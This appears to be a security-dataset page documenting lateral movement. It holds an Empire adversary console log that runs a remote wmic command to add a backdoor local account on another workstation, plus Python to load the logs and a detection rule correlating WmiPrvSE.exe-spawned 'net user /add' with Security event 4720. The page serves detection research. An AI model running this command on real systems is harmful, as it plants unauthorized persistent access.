Empire Remote WMIC Add User
Metadata

| Field | Value |
|---|---|
| Contributors | Roberto Rodriguez @Cyb3rWard0g |
| Creation Date | 2020/09/14 |
| Modification Date | 2020/09/22 |
| Tactics | |
| Techniques | |
| Tags | WMI IWbemServices ExecMethod, User Backdoor |
Dataset Description

This dataset represents an adversary remotely executing code via WMI to add a backdoor user on the target system. It focuses on the use of the WMI Win32_Process class and its Create method: the attacker's host issues a DCOM call to IWbemServices::ExecMethod on the target, the WMI provider host (WmiPrvSE.exe) on the target launches the supplied command line, and that command (net user /add) creates a new local account the adversary can later use to regain access.
Datasets Downloads

| Type | Link |
|---|---|
| Host | https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_wmic_add_user_backdoor.zip |
Adversary View

```
(Empire: agents) >
[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5
[*] New agent 6Z78CY25 checked in
[+] Initial agent 6Z78CY25 from 172.18.39.5 now active (Slack)
[*] Sending agent (stage 2) to 6Z78CY25 at 172.18.39.5
agents
[*] Active agents:
Name     La Internal IP  Machine Name  Username            Process     PID   Delay  Last Seen            Listener
----     -- -----------  ------------  --------            -------     ---   -----  ---------            ----------------
KFL6CMNZ ps 172.18.39.5  WORKSTATION5  *THESHIRE\pgustavo  powershell  7584  5/0.0  2020-09-14 11:33:59  http
YGBLW8EM ps 172.18.39.5  WORKSTATION5  *THESHIRE\wardog    powershell  8924  5/0.0  2020-09-14 11:40:53  http
UBCKLYFA ps 172.18.39.5  WORKSTATION5  *THESHIRE\pgustavo  powershell  5412  5/0.0  2020-09-14 11:57:16  http
6Z78CY25 ps 172.18.39.5  WORKSTATION5  *THESHIRE\pgustavo  powershell  9564  5/0.0  2020-09-14 12:02:08  http
(Empire: agents) > interact 6Z78CY25
(Empire: 6Z78CY25) >
(Empire: 6Z78CY25) > shell wmic /node:WORKSTATION6 process call create "net user /add backdoor pa$$w0rd1"
[*] Tasked 6Z78CY25 to run TASK_SHELL
[*] Agent 6Z78CY25 tasked with task ID 1
(Empire: 6Z78CY25) >
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 7768;
ReturnValue = 0;
};
..Command execution completed.
(Empire: 6Z78CY25) >
```

The agent runs on WORKSTATION5 and targets WORKSTATION6 over the network (/node:), so the process creation, the net.exe command line and the account creation all land in WORKSTATION6's event logs, while WORKSTATION5 only shows the wmic.exe client. A ReturnValue of 0 from Win32_Process.Create() means the process was started, not that net user succeeded; the Security log on the target confirms whether the account was actually created.
Explore Datasets

Download & Decompress Dataset

```python
import requests
from zipfile import ZipFile
from io import BytesIO

url = 'https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_wmic_add_user_backdoor.zip'
zipFileRequest = requests.get(url)
zipFileRequest.raise_for_status()
zipFile = ZipFile(BytesIO(zipFileRequest.content))
# The archive holds a single newline-delimited JSON file; extract it to the working directory
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])
```

Read JSON File

```python
import pandas as pd

# One JSON object per line, so lines=True
df = pd.read_json(path_or_buf=datasetJSONPath, lines=True)
```

Access Security Events

```python
# Count events per log channel (Security, Sysmon, PowerShell, ...) to see what the dataset contains
df.groupby(['Channel']).size().sort_values(ascending=False)
```
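The adversary view above shows the command landing on WORKSTATION6 through Win32_Process.Create(). The following example is added for this page and is not part of the OTRF notebook or the dataset; it shows detection logic for that pattern run over constructed sample records shaped like the dataset's flattened events: a Sysmon process-creation event whose parent is WmiPrvSE.exe and whose command line runs `net user /add`, correlated with a Security 4720 account-creation event on the same host shortly afterwards. The field names (Channel, EventID, @timestamp, Hostname, Image, ParentImage, CommandLine, TargetUserName) and the sample records are assumptions about the schema, not values copied from the dataset; the functions take a list of dicts, so `df.to_dict("records")` from the cell above feeds them the real data.

```python
from datetime import datetime
from typing import Dict, Iterable, List
import re

# Constructed sample records shaped like the flattened events in the dataset
# (one dict per event, as df.to_dict("records") would yield). The field names
# used here are an assumption about the dataset schema, not taken from the page.
SAMPLE_EVENTS: List[Dict] = [
    # Sysmon 1 on the target: WmiPrvSE.exe services Win32_Process.Create()
    # and becomes the parent of the command line handed to it.
    {"@timestamp": "2020-09-14T16:05:10.000Z",
     "Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1,
     "Hostname": "WORKSTATION6.theshire.local",
     "Image": "C:\\Windows\\System32\\net.exe",
     "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "CommandLine": "net user /add backdoor pa$$w0rd1"},
    # net.exe forwards the work to net1.exe; its parent is net.exe, not WMI.
    {"@timestamp": "2020-09-14T16:05:10.050Z",
     "Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1,
     "Hostname": "WORKSTATION6.theshire.local",
     "Image": "C:\\Windows\\System32\\net1.exe",
     "ParentImage": "C:\\Windows\\System32\\net.exe",
     "CommandLine": "C:\\Windows\\system32\\net1 user /add backdoor pa$$w0rd1"},
    # Security 4720: the local account was created.
    {"@timestamp": "2020-09-14T16:05:11.000Z",
     "Channel": "Security", "EventID": 4720,
     "Hostname": "WORKSTATION6.theshire.local",
     "TargetUserName": "backdoor"},
    # Benign noise: an admin in an interactive cmd.exe querying an account.
    {"@timestamp": "2020-09-14T16:07:00.000Z",
     "Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1,
     "Hostname": "WORKSTATION5.theshire.local",
     "Image": "C:\\Windows\\System32\\net.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "net user wardog"},
]

SYSMON = "Microsoft-Windows-Sysmon/Operational"
# "net user ... /add" via net.exe or net1.exe, any path prefix, any casing
ADD_USER_RE = re.compile(r"\bnet1?(\.exe)?\b.*\buser\b.*\s/add\b", re.IGNORECASE)


def _ts(event: Dict) -> datetime:
    """Parse the ISO-8601 timestamp; rewrite the trailing 'Z' for older Pythons."""
    return datetime.fromisoformat(event["@timestamp"].replace("Z", "+00:00"))


def wmi_spawned_processes(events: Iterable[Dict]) -> List[Dict]:
    """Sysmon EventID 1 records whose parent image is WmiPrvSE.exe."""
    return [
        e for e in events
        if e.get("Channel") == SYSMON and e.get("EventID") == 1
        and (e.get("ParentImage") or "").lower().endswith("\\wmiprvse.exe")
    ]


def wmi_add_user_events(events: Iterable[Dict]) -> List[Dict]:
    """WMI-spawned processes whose command line adds a user account."""
    return [
        e for e in wmi_spawned_processes(events)
        if ADD_USER_RE.search(e.get("CommandLine") or "")
    ]


def correlate_account_creation(events: Iterable[Dict], window_seconds: int = 60) -> List[Dict]:
    """Pair each WMI-spawned 'net user /add' with a Security 4720 on the same
    host within window_seconds after it, so the alert names the new account."""
    events = list(events)
    created = [e for e in events
               if e.get("Channel") == "Security" and e.get("EventID") == 4720]
    hits = []
    for proc in wmi_add_user_events(events):
        for acct in created:
            if acct.get("Hostname") != proc.get("Hostname"):
                continue
            delta = (_ts(acct) - _ts(proc)).total_seconds()
            if 0 <= delta <= window_seconds:
                hits.append({
                    "Hostname": proc["Hostname"],
                    "CommandLine": proc["CommandLine"],
                    "TargetUserName": acct.get("TargetUserName"),
                    "SecondsAfter": delta,
                })
    return hits


if __name__ == "__main__":
    for hit in correlate_account_creation(SAMPLE_EVENTS):
        print(hit)
```

Two design points: only the first hop carries the WmiPrvSE.exe parent, because net.exe immediately re-launches itself as net1.exe with net.exe as parent, so a rule that keys on the child image alone would miss the WMI origin; and a WmiPrvSE.exe parent by itself is noisy on hosts where management agents use WMI for inventory, which is why the command line and the 4720 on the same host are required before alerting. On the real dataset, run `correlate_account_creation(df.to_dict("records"))` after the cells above.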